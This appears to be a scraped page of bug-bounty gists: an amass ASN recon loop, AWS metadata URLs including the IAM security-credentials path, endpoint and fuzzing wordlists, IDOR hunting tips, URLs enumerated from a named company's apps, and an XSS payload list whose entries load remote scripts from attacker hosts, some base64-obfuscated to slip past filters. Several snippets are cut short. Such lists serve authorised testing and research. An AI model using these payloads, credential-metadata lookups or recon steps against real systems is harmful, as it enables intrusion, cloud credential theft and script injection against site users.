This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
asnlist=(59055 59054 59053 5905 259051 59028 45104 45103 45102 45096 37963 34947 134963) | |
for i in ${asnlist[@]} ; do | |
amass intel -active -asn $i -p 80,4443,2075,2076,6443,3868,3366,8443,8080,9443,9091,3000,8000,5900,8081,6000,10000,8181,3306,5000,4000,8888,5432,15672,9999,161,4044,7077,4040,9000,8089,443,744 | |
echo "searching $i" | |
done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## AWS | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/ami-id | |
http://169.254.169.254/latest/meta-data/reservation-id | |
http://169.254.169.254/latest/meta-data/hostname | |
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests, json | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning, InsecurePlatformWarning, SNIMissingWarning | |
from bs4 import BeautifulSoup | |
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
requests.packages.urllib3.disable_warnings(InsecurePlatformWarning) | |
requests.packages.urllib3.disable_warnings(SNIMissingWarning) | |
# another source of cidrs by asn | |
def getIPCidrs(asn): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/2 | |
/graphql-proxy/admin | |
/3.0/ | |
/3ds_callback | |
/3ds_update_payment_callback | |
/accounts | |
/active | |
/activity | |
/actuator | |
/actuator/auditevents |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
* If worldist can't find anything on api, use hakrawler | |
* every domain could have an api. add jSON extension to endpoints and see response | |
* If IDs are not numerical. Try to find leaked IDs from other places. (e.g.: posts the user created, and other features) | |
* Some endpoints will return you UUID as a response to e-mail adress etc... | |
* If there is no leak of User ID, just swap with user id of another account you created | |
* Look for permissions in every endpoint | |
* change lowercase to uppercase or vice versa in endpoints | |
* After finding endpoints, Arjun it | |
* Use all HTTP Request methods | |
* Look for IDORs in HTTP headers and body |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Version Information: Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3650.0 | |
http://apps.bentley.com:80/claimsviewerims | |
http://apps.bentley.com:80/claimsviewerims/default.aspx | |
http://apps.bentley.com:80/srmanager | |
http://apps.bentley.com:80/srmanager/AccountSRs | |
http://apps.bentley.com:80/srmanager/AccountSRs/SRList | |
http://apps.bentley.com:80/srmanager/Billing | |
http://apps.bentley.com:80/srmanager/Billing/ProblemArea | |
http://apps.bentley.com:80/srmanager/Billing/ProblemAreaContact |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<iframe srcdoc='<script src=https://myeviljsbucket.s3.amazonaws.com/evilscript.js></script>'></iframe> //When CSP disallows inline js but it allows s3 buckets. "<script>" tag doens't work but there is HTML injection!! | |
<svg/onload=alert(1)> //this is everywhere | |
<img src=x onerror=alert(document.domain)> //this is also everywhere | |
"><script src=https://ubey.xss.ht></script> | |
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://ubey.xss.ht\';document.body.appendChild(a)') //For use where URI's are taken as input. | |
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus> //For bypassing poorly designed blacklist systems with the HTML5 autofocus attribute. | |
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))> //Another basic payload for when <script> tags |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/ | |
/* | |
/*.* | |
/*? | |
/*?* | |
/.../.../.../ | |
/./ | |
// | |
/// | |
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
X-Forwarded-Host: | |
Host: | |
Referer: | |
X-Forwarded-For: |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/ | |
! | |
!= | |
&& | |
* | |
*& | |
*.* | |
*? | |
*?* | |
.../.../.../ |
OlderNewer